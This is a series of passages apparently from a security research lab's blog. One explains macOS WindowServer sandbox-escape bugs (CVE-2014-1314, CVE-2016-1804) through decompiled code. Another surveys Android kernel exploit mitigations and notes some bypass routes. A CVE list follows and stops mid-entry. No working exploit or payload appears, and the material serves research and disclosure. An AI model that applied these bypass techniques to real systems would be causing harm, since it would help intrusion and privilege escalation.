__int64 __fastcall _XPostFilteredEventTapDataSync(_DWORD *a1, __int64 a2)
{
  ...
  else
  {
    *(_DWORD *)(a2 + 32) = post_filtered_event_tap_data(a1[8], a1[9], (unsigned int)a1[10], a1[11], a1 + 13, v3);
  }
  result = *(_QWORD *)NDR_record_ptr;
  *(_QWORD *)(a2 + 24) = *(_QWORD *)NDR_record_ptr;
  return result;
}

However, in post_filtered_event_tap_data, it checks sandbox unfortunately:

__int64 __fastcall post_filtered_event_tap_data(unsigned int a1, unsigned int a2, __int64 a3, unsigned int a4, _DWORD *a5, unsigned int a6)
{
...
  if ( CGXSenderCanSynthesizeEvents() ) //check here
  {
  ...
}

bool CGXSenderCanSynthesizeEvents()
{
  unsigned int v0; // ecx@1
  bool result; // al@2

  v0 = WSGetLastMessageAuditTrailerPid();
  if ( v0 )
    result = (unsigned int)sandbox_check(v0, "hid-control", 0LL) == 0; // failed to pass the check
  else
    result = 0;
  return result;
}

Because most of the sandboxed application won’t have “hid-control” entitlement, my initial trial has to stop here.

Another thought is to add a customized hotkey by calling _XSetHotKey, but also ended up with failure:

__int64 __fastcall _XSetHotKey(__int64 a1, __int64 a2)
{
  ...
  if ( v20 && (unsigned int)sandbox_check(*(unsigned int *)(v20 + 284), "hid-control", 0LL) ) //sandbox check here
            goto LABEL_39;
        }
      }
...
LABEL_39:
    *(_DWORD *)(a2 + 32) = v7;
    goto LABEL_40;
  }
  *(_DWORD *)(a2 + 32) = -304;
LABEL_40:
  result = *(_QWORD *)NDR_record_ptr;
  *(_QWORD *)(a2 + 24) = *(_QWORD *)NDR_record_ptr;
  return result;
}

Actually among the above API set, many interfaces are regarded as “unsafe”, thus sandbox check is performed on those server-side APIs. Typical examples include event tap, hotkey configuration, etc. Because of that, on a sandboxed application, dangerous operations such as adding a hotkey, or post an event tap (e.g sending a mouse clicking event), are strictly forbidden.

On the other side, some interfaces are partially allowed. Typical examples include CIFilter, Window related interfaces, etc. Such interfaces perform operations on specific entities that belong to the caller’s process. For example, API __XMoveWindow performs window move operation. It accepts a user-provided window ID and perform the check by calling connection_holds_rights_on_window function to determine whether the window is allowed to move by caller’s process. Actually only window owner’s process is allowed to do such operations.(or some special entitlement is needed to have the privilege allowing to perform operations on any window):

__int64 __usercall _XMoveWindow@(__int64 a1@, _DWORD *a2@, __int64 a3@, __int128 _XMM0@)
{
 
    if ( (unsigned __int8)connection_holds_rights_on_window(v8, 1LL, v7, 1LL, 1LL) //check window rights of the source process
      || (v9 = 1000, v7)
      && (v10 = (unsigned __int8)connection_holds_rights_on_window(v8, 4LL, v7, 1LL, 1LL) == 0, v9 = 1000, !v10) )
    {
      __asm
      {
        vcvtsi2ss xmm0, xmm0, r12d
        vcvtsi2ss xmm1, xmm0, r13d
      }
      v9 = CGXMoveWindowList(v8, (char *)&v14 + 4, 1LL);
    }
    *(_DWORD *)(a3 + 32) = v9;
  }
  result = *(_QWORD *)NDR_record_ptr;
  *(_QWORD *)(a3 + 24) = *(_QWORD *)NDR_record_ptr;
  return result;
}

At this point, it made me believe Apple has considered everything to make Apple sandbox compatible to those older components.
But luckily I started thinking all of those in the year 2013, which is a pretty good time. I finally found a bug where Apple failed to consider.

0x6 CVE-2014-1314: the old legend

As we know, Apple sandbox was introduced not long time ago, while Apple graphics has a much longer history. The original design of Apple graphics doesn’t take sandbox stuff into account. Although years have been spent to improve the graphics security under the sandboxed context, there are still issues left. CVE-2014-1314 is a typical example, which I used it in Pwn2Own 2014. The issue exists in CoreGraphics session APIs. CoreGraphics provides a client side API CGSCreateSessionWithDataAndOptions which sends request to be handled by server side API _XCreateSession.
_XCreateSession will reach the following code:

__int64 __fastcall __CGSessionLaunchWorkspace_block_invoke(__int64 a1)
{ 
...
v28 = fork(); //fork
if ( v28 == -1 )
{
  v29 = *__error();
CGSLogError("%s: cannot fork workspace (%d)", v37);
v3 = 1011; }
else
{
if ( !v28 )
{
  setgid(HIDWORD(v24));
  setuid(v24); //set uid to current user’s uid
  setsid();
  chdir("/");
  v35 = open("/dev/null", 2, 0LL);
v36 = v35;
if ( v35 != -1 )
{
  dup2(v35, 0);
  dup2(v36, 1);
  dup2(v36, 2);
...
  if ( v36 >= 3 )
    close(v36);
}
execve(v9, v40, v44);
_exit(127);
}

This function allows the user to create a new logon session. By default, WindowServer will create a new process at “/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow” and launch the login window under the current user’s context (by calling setuid and setgid to the user’s. Oh, WindowServer has can setuid!!). Apple also allows user to specify customized login window, which - on the contrary - allows attackers in the sandboxed context to run any process at an unsandboxed context.

0x7 CVE-2016-1804: the memory corruption

Now let’s back to the year 2016. In CoreGraphics, some new interfaces (We count them as Misc category) were introduced to align with new models of MacBook. For example, interface _XSetGlobalForceConfig allows a user to configure force touch. Users can provide with force touch configuration data and serialize them. _XSetGlobalForceConfig saves the serialized data into CFData and call _mthid_unserializeGestureCon guration API to unserialize the data.

__int64 __fastcall _XSetGlobalForceConfig(__int64 a1, __int64 a2)
{
...
   v5 = *(_QWORD *)(a1 + 28); //v5 is a pointer pointing to user controllable data
   v6 = CFDataCreateWithBytesNoCopy(*(_QWORD *)kCFAllocatorDefault_ptr, 
        v5, 
        v4, 
        *(_QWORD *)kCFAllocatorNull_ptr); // create CFData on v5
  
  v7 = _mthid_unserializeGestureConfiguration(v6); //try to unserialize the data
   if ( v6 )
     CFRelease(v6, v5); //free the CFData twice!
...
}

_mthid_unserializeGestureConfiguration forgets to retain the CFData and calls CFRelease to free the data if the force touch configuration is not valid. After _mthid_unserializeGestureCon guration function returns, _XSetGlobalForceConfig frees the data again and causes the double free.

__int64 __fastcall _mthid_unserializeGestureConfiguration
   (__int64 a1)
{ ...
if ( v2 ) {
   if ( !(unsigned __int8)
_mthid_isGestureConfigurationValid(v2) )
CFRelease(a1); //if the data is invalid, free it once
result = v2; }
}
return result;
}

0x8 Wrap-up: exploitable?

CVE-2016-1804 looks unexploitable because:

small time window between two frees (crash if failure to fill in data in between?)
All CoreGraphics interfaces are running in a server loop on a single thread, not possible to leverage another CoreGraphics API to attempt racing and filling in at another thread.
ASLR/DEP consideration

Here I leave the questions to readers and I will discuss about the exploitation at Part 2 next week.

Emerging Defense in Android Kernel

2016-06-01T13:33:23.000Z

There was a time that every Linux kernel hacker loves Android. It comes with a kernel from stone-age with merely any exploit mitigation. Writing exploit with any N-day available was just a walk in the park.
Now a days Google, ARM and many other SoC/device vendors have put many efforts hardening the security of Android, including its kernel, which is (in most cases) the last defense against attack.

As a group of Android gurus focusing on rooting, we probably facing these defense more than researchers in other fields. In this post we are going to summarize kernel exploit mitigations appeared in the recent 2 years, and sharing our opinions on their effectiveness.

Note that we are going to focus on the implementation of mitigations in this post. We may point out its weakness, but we are not going to detail bypassing techniques for each mitigation.

Outline

Hardware
Google/Linux
Vendors
- Samsung
- Others

Hardware

As Intel has officially abandoned its Atom product line, no one is going to challenge ARM’s Android dominance soon enough. We will be focusing on ARM for the rest part of this post, since no one cares any other architecture for Android :p

MMU
Modern ARM processors come with a comprehensive MMU, providing basic V2P translation, access control, TLB, ASIDs and many other memory management features. Among them, both 32-bit (arm) and 64-bit (arm64) mode of recent ARM architectures provide full RWX access control on pages level. In addition, one of the key “advanced” security features is PXN (Privilege Execute-Never), a feature with similar idea of Intel’s SMEP but different in implementation details. PXN has been widely enabled on 64-bit devices as a relief of ret2usr attacks.
Details on how Android kernel utilize these features will be discussed in further sections.

TrustZone
TrustZone is an extension to ARM cores, which creates two “worlds”. The following figure describes how this works:

Source: https://genode.org/documentation/articles/trustzone

Although few restrictions are there that how vendor can utilize Trustzone, usually the feature-rich OS, aka Android, in our case, is going to run in the normal world. The secure world will be hosting trustlets on a light-weight OS.
As a secure world running in parallel with the normal world, compromising the kernel in normal world shall not affect the secure world if the implementation was properly done, as their communication is handled by the privileged monitor mode code usually loaded by low-level bootrom. However, there are cases seen that secure world can also be compromised due to its own bug or bugs in monitor mode.

Google/Linux

As the open source software being used most widely, Linux kernel can be modified by many parties, which not all of these modifications are merged into mainline. Here we will be only discussing the features implemented in mainline and appear in Google’s Android kernel repositories.
Linux kernel has utilized many features to harden the kernel. One of them is protecting critical memory zones like kernel text and non-volatile data. Recent Linux mainline kernel has this feature implemented through CONFIG_DEBUG_RODATA:

CONFIG_DEBUG_RODATA    arm    prompt: Make kernel text and rodata read-only    type: bool    depends on: ( CONFIG_MMU && ! CONFIG_XIP_KERNEL ) && ( CONFIG_CPU_V7 )    defined in arch/arm/mm/Kconfig    found in Linux kernels: 3.19, 4.0–4.6, 4.6+HEAD    Help text:    If this is set, kernel text and rodata memory will be made read-only, and non-text kernel memory will be made non-executable. The tradeoff is that each region is padded to section-size (1MiB) boundaries (because their permissions are different and splitting the 1M pages into 4K ones causes TLB performance problems), which can waste memory.    arm64    prompt: Make kernel text and rodata read-only    type: bool    depends on: (none)    defined in arch/arm64/Kconfig.debug    found in Linux kernels: 4.0–4.6, 4.6+HEAD    Help text:    If this is set, kernel text and rodata will be made read-only. This is to help catch accidental or malicious attempts to change the kernel's executable code.    If in doubt, say Y

Note that despite having “DEBUG” in its name, this is actually recommended for arm64. It should be enabled by default for arm also.

During kernel boot, in init/main.c, kernel_init() will call mark_rodata_ro() to literally mark every read-only section with proper permissions:

static int __ref kernel_init(void *unused)
{
    kernel_init_freeable();
...
    mark_rodata_ro();
...
}

Function mark_rodata_ro() will do nothing if CONFIG_DEBUG_RODATA is not defined:

1
2
3

#ifndef CONFIG_DEBUG_RODATA
static inline void mark_rodata_ro(void) { }
#endif

If it is defined, though, the implementation of mark_rodata_ro() will be architecture specific, which means you should be looking for its definition in arch/arm and arch/arm64. For both architectures, Linux kernel leverages “section” page entry to improve performance and reduce memory profile of the page table for kernel virtual address space. A “section” page entry usually is one level up than actual page entry (which represents 1 page). Doing so will allow MMU to walk the page table faster by reducing the depth and make TLB more efficient, as there are far fewer entries to be cached. This does come with a cost though, that sections must be aligned at MiB level (1MB or 2MB), which means some physical RAM can be wasted. Of course, this is a minor problem for modern devices as many of them has more than 2GB of RAM.

You may have noticed that the kernel versions mentioned above are far beyond common versions we seen in Android (3.19+ vs. 3.4/3.10/3.18). However, since the patch is really simple, Google and other vendors actively back-port these features to their own kernel repositories. This also caused some chaos that the actual code varies among different vendors, but eventually they are just doing the same stuff, which sets up the page table entries for kernel virtual address space.

For arm, a section page entry means a first-level section type PMD (folded up). Per ARM definition, the 2nd bit of the entry indicates whether it is a conventional entry or a section one. Note that super-section is not utilized here.

Origin: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dai0425/BABCDECH.html

The bit AP[2], aka APX, together with AP[1:0], will determine both user and privileged permissions:

  APXAP[1:0]  Privileged    User  0  b00      No access     No access  0  b01      Read/write    No access  0  b10      Read/write    Read-only  0  b11      Read/write    Read/write  1  b00      –             –[ 1  b01      Read-only     No access ]  1  b10      Read-only     Read-only  1  b11      Read-only     Read-only

Source: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0211k/Caceaije.html
So for any kernel text/rodata section, it will be APX:=1 and AP[1:0]:=b01. This is defined in mainline code in arch/arm/mm/init.c:

#ifdef CONFIG_DEBUG_RODATA
static struct section_perm ro_perms[] = {
       /* Make kernel code and rodata RX (set RO). */
       {
               .start  = (unsigned long)_stext,
               .end    = (unsigned long)__init_begin,
...
               .mask   = ~(PMD_SECT_APX | PMD_SECT_AP_WRITE),
               .prot   = PMD_SECT_APX | PMD_SECT_AP_WRITE,
               .clear  = PMD_SECT_AP_WRITE,
#endif
       },
};
#endif

For arm64, there is a difference that by default it has a 3-level page table. This is for the apparent reason that the virtual address space is much bigger. So for now section (while still being PMD) is now a second-level one. Sometimes it is also called a “block”. The attributes available for a block are:

Source: http://armv8-ref.codingbelief.com/en/chapter_d4/d43_3_memory_attribute_fields_in_the_vmsav8-64_translation_table_formats_descriptors.html

It has only two bits for access permissions, noted as AP, and the mapping is simpler than arm:

  APUnprivileged (EL0)   Privileged (EL1/2/3)  00No access         Read and write  01Read and write        Read and write  10No access         Read-only  11Read-only         Read-only

Source: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.den0024a/BABCEADG.html

It is quite clear that we need to set AP[1] for read-only. So we have the following code in arch/arm64/mm/mmu.c:

#ifdef CONFIG_DEBUG_RODATA
void mark_rodata_ro(void)
{
        create_mapping_late(__pa(_stext), (unsigned long)_stext,
                                (unsigned long)_etext - (unsigned )_stext,
                                PAGE_KERNEL_EXEC | PTE_RDONLY);
}
#endif

One attack against kernel read-only protection is to modify the kernel page table and change the permission of corresponding entries. This requires a bug which may lead to kernel write, controlled bit flip or code execution. Note that Samsung has TrustZone/Hypervisor components which protects the page table, which will be discussed in later sections. Info-leak is not needed in this case since the “template” of kernel page table is a static object determined at link time. The location is assigned to init_mm as its initial value in mm/init-mm.c:

struct mm_struct init_mm = {
  .mm_rb    = RB_ROOT,
  .pgd    = swapper_pg_dir,
  ...
};

The value of swapper_pg_dir varies from arch to arch. For both arm and arm64, they are defined in head.S. For arm:

1
2
3

#define PG_DIR_SIZE 0x4000  // aka 4 pages
  .globl  swapper_pg_dir
  .equ  swapper_pg_dir, KERNEL_RAM_VADDR - PG_DIR_SIZE

And for arm64:

#define SWAPPER_DIR_SIZE  (3 * PAGE_SIZE)
...
  .globl  swapper_pg_dir
  .equ  swapper_pg_dir, KERNEL_RAM_VADDR - SWAPPER_DIR_SIZE

So for these two architectures, it starts at 4 pages and 3 pages ahead of kernel text prespectively. Kernel text starts relatively at a fixed location for most of the devices (or at least for specific SoCs), so we can predict the beginning of this critical kernel data structure.

Besides CONFIG_DEBUG_RODATA, PXN is also a very important security feature which has been enabled in recent kernel versions. By the time Android L was released, PXN has been enabled on all arm64 devices. Note that PXN bit also presents in arm32 since ARMv7, but seldomly used.

PXN on arm64 was introduced into Linux kernel by commit 8e620b0476696e9428442d3551f3dad47df0e28f (https://kernel.googlesource.com/pub/scm/linux/kernel/git/jic23/iio/+/8e620b0476696e9428442d3551f3dad47df0e28f). It basically set PXN bit on every permission templates for user-space, as well as UXN/PXN bits for non-executable pages. This makes sure that every user-space page is mapped with PXN bit set, which mitigates ret2usr attack:

    -#define PAGE_NONE_MOD_PROT(pgprot_default, PTE_NG | PTE_XN | PTE_RDONLY)    -#define PAGE_SHARED_MOD_PROT(pgprot_default, PTE_USER | PTE_NG | PTE_XN)    ...    -#define PAGE_KERNEL_EXEC_MOD_PROT(pgprot_default, PTE_DIRTY)    +#define PAGE_NONE_MOD_PROT(pgprot_default, PTE_NG | PTE_PXN | PTE_UXN | PTE_RDONLY)    +#define PAGE_SHARED_MOD_PROT(pgprot_default, PTE_USER | PTE_NG | PTE_PXN | PTE_UXN)    +#define PAGE_SHARED_EXEC_MOD_PROT(pgprot_default, PTE_USER | PTE_NG | PTE_PXN)    ...    +#define PAGE_KERNEL_EXEC_MOD_PROT(pgprot_default, PTE_UXN | PTE_DIRTY)    -#define __PAGE_NONE__pgprot(_PAGE_DEFAULT | PTE_NG | PTE_XN | PTE_RDONLY)    -#define __PAGE_SHARED__pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_XN)    ...    -#define __PAGE_READONLY_EXEC__pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_RDONLY)    +#define __PAGE_NONE__pgprot(_PAGE_DEFAULT | PTE_NG | PTE_PXN | PTE_UXN | PTE_RDONLY)    +#define __PAGE_SHARED__pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN | PTE_UXN)    ...    +#define __PAGE_READONLY_EXEC__pgprot(_PAGE_DEFAULT | PTE_USER | PTE_NG | PTE_PXN | PTE_RDONLY)

Just like those read-only bits, PXN can also be disabled. But keep in mind that PXN bits are set in user virtual address space, which means they are dynamically allocated, so unlike kernel ones, you will need a good kernel read bug to locate the entry to be manipulated. Usually with both read and write, there is really no need of code execution. So this is not very practicable in real exploit.

Vendors

Samsung
Samsung has been a pioneer in terms of Android security hardening for the past years. It was actively involved in enabling SELinux (SEAndroid) for Android, implementing multiple security hardening in kernel and invented the KNOX Active Protection, which is the first TrustZone (TIMA) /Hypervisor based active protection for kernel.

Taking kernel module as an example, since Galaxy S4 (or maybe even earlier), Samsung has implemented lkmauth (loadable kernel module authentication) based on TIMA (TrustZone based Integrity Measurement Architecture). For each kernel module get loaded, getting root privilege is not enough, which the kernel module itself will go through a mandatory digital signature verification happens in TrustZone instead of normal world OS. This means even though an attack can compromise kernel and gain arbitrary read/write, he/she can still not load any kernel module for convenient kernel code execution.

However, lkmauth still had its weakness, which was pointed out in multiple public sessions, including:

Advanced Bootkit Techniques on Android, Zhangqi Chen & Di Shen, SyScan360 2014
Adaptive Android Kernel Live Patching, Tim Xia & Yulong Zhang, HITBSecConf 2016
It was pointed out that patching the code of lkmauth() itself can successfully bypass the logic and allow kernel module to be loaded. It’s actually a problem about the trusted computing basee is not really trustworthy (kernel text can be compromised). Samsung has fixed this weakness since Galaxy S5, by introducing TIMA protected page table and read-only kernel text/data into the kernel. It was a surprise that this weakness got mentioned again in the latter session in 2016. Per the slides, the device demonstrated was a Galaxy S4, which may explain why lkmauth() can still be patched.

Besides kernel module authentication, Samsung has enforced KNOX Active Protection (KAP) since 5.1.1 ROMs for Galaxy S6/S6 Edge. This seems to be a reaction to the release of PingPong root. In that version of KAP, Samsung did not only protect the page table, but also put crucial kernel objects like credentials into consideration. For example, a dedicated cache (kmem_cache) is created for credential objects, which all pages assigned to the cache are marked as read-only for kernel. In kernel/cred.c:

void __init cred_init(void)
{
  /* allocate a slab in which we can store credentials */
  cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred),
             0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
#ifdef  CONFIG_RKP_KDP
  if(rkp_cred_enable) {
    cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
        0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, cred_ctor);
    if(!cred_jar_ro) {
      panic("Unable to create RO Cred cache\n");
    }

    tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
        0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, sec_ctor);
    if(!tsec_jar) {
      panic("Unable to create RO security cache\n");
    }

    rkp_call(RKP_CMDID(0x42),(unsigned long long )cred_jar_ro->size,(unsigned long long)tsec_jar->size,0,0,0);
  }
#endif  /* CONFIG_RKP_KDP */
}

The cred_ctor() and sec_ctor() are dummy constructor routines to make sure that the RO cred/security caches are not merged (SLUB merge) with other caches. The cache names are critical here since it has been hard coded in SLUB implementation. In mm/slub.c:

#define check_cred_cache(s,r)     \
do {              \
  if ((s->name) && (!strcmp(s->name,CRED_JAR_RO) || !strcmp(s->name,TSEC_JAR) || !strcmp(s->name,VFSMNT_JAR) )) \
    return r;   \
} while (0)

When the two “_ro” caches are create, the underlying implementation of kmem_cache_create, allocate_slab, is also modified to assign dedicated pages to the read-only caches:

static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
  struct page *page;
  struct kmem_cache_order_objects oo = s->oo;
#ifdef CONFIG_RKP_KDP
  void *virt_page = NULL;
#endif /*CONFIG_RKP_KDP*/
...
#ifdef CONFIG_RKP_KDP
  if (s->name &&
    (!strcmp(s->name, CRED_JAR_RO) ||
    !strcmp(s->name, TSEC_JAR)||
    !strcmp(s->name, VFSMNT_JAR))) {

    virt_page = rkp_ro_alloc();
    if(!virt_page)
      goto def_alloc;

    page = virt_to_page(virt_page);
    oo = s->min;
  } else {
def_alloc:
#endif /*CONFIG_RKP_KDP*/
...
#ifdef CONFIG_RKP_KDP
  }
#endif /*CONFIG_RKP_KDP*/
  if (kmemcheck_enabled && page
    && !(s->flags & (SLAB_NOTRACK | DEBUG_DEFAULT_FLAGS))) {
...
#ifdef CONFIG_RKP_KDP
  /*
   * We modify the following so that slab alloc for protected data
   * types are allocated from our own pool.
   */
  if (s->name)  {
    u64 sc,va_page;
    va_page = (u64)__va(page_to_phys(page));

    if(!strcmp(s->name, CRED_JAR_RO)){
      for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
        rkp_call(RKP_CMDID(0x50),va_page,0,0,0,0);
        va_page += PAGE_SIZE;
      }
    }
    ...
  }
#endif
  return page;
}

With the pages read-only to kernel, any allocation/modification of these objects must be done through calling the hyp component. This helps mitigating conventional DKOM exploit. So far, this is the most efficient mitigation we’ve seen in Android. The best choice of bypassing this might be code-reuse attack, however, can still be further mitigated through validating in tz/hyp.

Besides these “high-end” mitigations, Samsung also customized some syscalls to restrict post-exploit activities. Taking fork/execve as an example. These two are basically the underlying syscalls behind “system”, a very common routine an exploit will utilize after privilege escalation. So Samsung added some additional check in execve (fs/exec.c):

SYSCALL_DEFINE3(execve,
    const char __user *, filename,
    const char __user *const __user *, argv,
    const char __user *const __user *, envp)
{
  struct filename *path = getname(filename);
  int error = PTR_ERR(path);
  ...
    if(CHECK_ROOT_UID(current)){
      if(sec_restrict_fork()){
        PRINT_LOG("Restricted making process. PID = %d(%s) "
                "PPID = %d(%s)\n",
        current->pid, current->comm,
        current->parent->pid, current->parent->comm);
        return -EACCES;
      }
    }
  ...
}

For any root process, sec_restrict_fork() will check if it is originated from /data. In general, this directory is the only place that an user application can start in. Samsung is hoping that this can stop rooting applications from spawning new process, in most cases a daemon running as root. But since they failed to protect some critical data structures being used inside sec_restrict_fork(), bypassing this check if far easiler than bypassing a tz/hyp assisted protection.

Others
Some mitigations were also seen on other manufacturers of Android devices. Besides system partition write protection, which seems to be the favourite of most vendors, a lot of efforts are also done to prevent devices from being rooted. The most ineffective way we have seen is to setup inotify on certain files, like /system/xbin/su. Simply killing the notifier is going to workaround this. But recently we’ve seen something more interesting from YunOS, a customized Android ROM from Alibaba.

One of the generic route we take for rooting is by modifying the addr_limit of current task’s thread_info structure. This allows the kernel to take the whole virtual address space (or sometimes just enough virtual address space) as “USER_DS” so read/write operation in the address range won’t be restricted for certain syscalls, like pipe_read and pipe_write. In the kernel of YunOS, we noticed the following code in el0_svc_naked:

The symbol el0_svc_naked is the entry of syscall of Linux on arm64. YunOS added one additional ext_security_pre_check before actually heading into the syscall. Apparently something is checked there. The function looks like this:

The first basic block extracts addr_limit from current context and check against the standard USER_DS value, 0x8000000000 (1 << 39). If it is not the desired value, it will enforce a SIGKILL to the calling process. Since SIGKILL can’t be masked, the calling process will be forcibly killed (which may lead to a panic if in the middle of exploit). This is by far the most effective exploit mitigation without tz/hyp assistance. Howevr, it can’t stop the following two scenarios:

One vulnerabilities or a set of vulnerabilities for direct kernel read/write
Pure code-reuse attack

Vulnerabilities leads to direct kernel read/write are quite hard to find now, but the latter one is still achievable. Besides commit_cred, there are still quite some routines can be used conveniently to modify credential of a task. By controlling a certain function entry with 1 or 2 argument would be more than enough.

Vulnerability Research is a Journey: CVEs Found by KeenLab

2016-05-31T03:08:15.000Z

Partly estimated, until May 2016, KeenLab has totally found 152 critical vulnerabilities with CVE IDs, ranging from mainstream OS to browsers and applications

Among those vulnerabilities we discovered, 13 was used directly in our 8 Pwn2Own winner categories in the past few years

CVE-2007-0071 got nomination of best client vulnerability at Pwnie Award 2008, which is Pwnie’s first to have Chinese researcher in the nomination list

Vulnerability CVE-2010-3333 affects all versions of Microsoft Office Word at that time with huge impact in that year

Vulnerability CVE-2015-3636 can root most of the Android devices in 2015. It got the nomination of best privilege escalation vulnerability at Pwnie Award 2015. It is also recognized by people from academic circle. We shared our research on ACM CCS 2015, Blackhat 2015, and USENIX WOOT 2015, etc.

CVE-2014-1303 and CVE-2014-1314 helped us pwn Safari on OS X in 2014, which is the first in Pwn2Own history to pwn 64bit browser on 64bit

CVE-2015-2435 and CVE-2015-2455 not only helped us win the Flash and Reader category in Pwn2Own 2015, but it is also the first team in Pwn2Own history to get SYSTEM privilege on Windows using TTF vulnerabilities. These two vulerabilities demonstrate KeenLab’s research strength on Windows font area as well as the Windows kernel. CVE-2015-2455 also got nomination of best privilege escalation vulnerability in Pwnie 2015

CVE-2016-1815 and its exploit successfully gained root privilege on latest OS X El Capitan in Pwn2Own 2016. The vulnerability resids in closed-source core graphics pipeline components of all Apple graphic drivers including the newest chipsets, and by our advanced exploitation approach we use single vulnerability to break Apple sandbox and get root.

These years, KeenLab has been shifting its research focus from PC to mobile. While continously discovering high quality + high number vulnerabilties on PC, research output on mobile platform is also outstanding.

Here is the list of CVEs：

Microsoft

CVE-2014-2819 (Pwn2Own 2014 Flash sandbox bypass on Windows 8.1)
Internet Explorer Elevation of Privilege Vulnerability
https://technet.microsoft.com/en-us/library/security/MS14-051

CVE-2015-2435 (Pwn2Own 2015 Flash sandbox bypass with System EoP on Windows 8.1)
TrueType Font Parsing Vulnerability
https://technet.microsoft.com/library/security/MS15-080

CVE-2015-2455 (Pwn2Own 2015 Reader sandbox bypass with System EoP on Windows 8.1 / Pwnie 2015 nomination)
TrueType Font Parsing Vulnerability
https://technet.microsoft.com/library/security/MS15-080

CVE-2016-0176 (Pwn2Own 2016 Edge sandbox bypass with System EoP on Windows 10
Microsoft DirectX Graphics Kernel Subsystem Elevation of Privilege Vulnerability
https://technet.microsoft.com/library/security/MS16-062

CVE-2010-3333
MICROSOFT WORD RTF FILE PARSING STACK BUFFER OVERFLOW VULNERABILITY
http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx

CVE-2007-2931
MSN Messenger Video Conversation Buffer Overflow Vulnerability
http://www.microsoft.com/technet/security/Bulletin/MS07-054.mspx

CVE-2008-1091
Microsoft Office RTF Parsing Engine Memory Corruption Vulnerability
http://www.microsoft.com/technet/security/bulletin/ms08-026.mspx

CVE-2008-3471
Microsoft Office Excel BIFF File Format Parsing Stack Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS08-057.mspx

CVE-2008-4027
Microsoft Office RTF Consecutive Drawing Object Parsing Heap Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-084/

CVE-2008-4028
Microsoft Office RTF Drawing Object Heap Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS08-072.mspx

CVE-2008-4837
Microsoft Office Word Document Table Property Stack Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS08-072.mspx

CVE-2009-1130
Microsoft Office PowerPoint Notes Container Heap Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS09-017.mspx

CVE-2009-0563
Microsoft Word Document Stack Based Buffer Overflow Vulnerability
http://www.microsoft.com/technet/security/bulletin/MS09-027.mspx

CVE-2009-1530
Microsoft Internet Explorer Event Handler Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-038/

CVE-2009-1531
Microsoft Internet Explorer onreadystatechange Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-039/

CVE-2009-1918
Microsoft Internet Explorer getElementsByTagName Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-047/

CVE-2009-1133
Microsoft Remote Desktop Client Arbitrary Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-057/

CVE-2009-1920
Microsoft Internet Explorer JScript arguments Invocation Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-09-062/

CVE-2009-2502
MICROSOFT WINDOWS GDI+ TIFF FILE PARSING BUFFER OVERFLOW VULNERABILITY
http://www.microsoft.com/technet/security/bulletin/ms09-062.mspx

CVE-2010-0244
Microsoft Internet Explorer Table Layout Col Tag Cache Update Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-011/

CVE-2010-0491
MICROSOFT INTERNET EXPLORER ‘ONREADYSTATECHANGE’ USE AFTER FREE VULNERABILITY
http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx

CVE-2010-1900
Microsoft Office Word sprmCMajority Record Parsing Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-150/

CVE-2010-1901
MICROSOFT OFFICE RTF PARSING ENGINE MEMORY CORRUPTION VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=877

CVE-2010-1902
MICROSOFT WORD RTF FILE PARSING HEAP BUFFER OVERFLOW VULNERABILITY
http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=876

CVE-2016-0193
Scripting Engine Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS16-052

CVE-2015-2383
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-065

CVE-2015-1753
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-056

CVE-2015-1689
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-043

CVE-2015-1691
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-043

CVE-2015-1718
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-043

CVE-2015-1657
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-032

CVE-2015-0056
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-018

CVE-2015-0039
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-009

CVE-2015-0066
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/MS15-009

CVE-2014-6375
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/ms14-080

CVE-2014-6339
Internet Explorer ASLR Bypass Vulnerability
https://technet.microsoft.com/library/security/MS14-065

CVE-2014-4130
Internet Explorer Memory Corruption Vulnerability
https://technet.microsoft.com/library/security/ms14-056

CVE-2014-2773
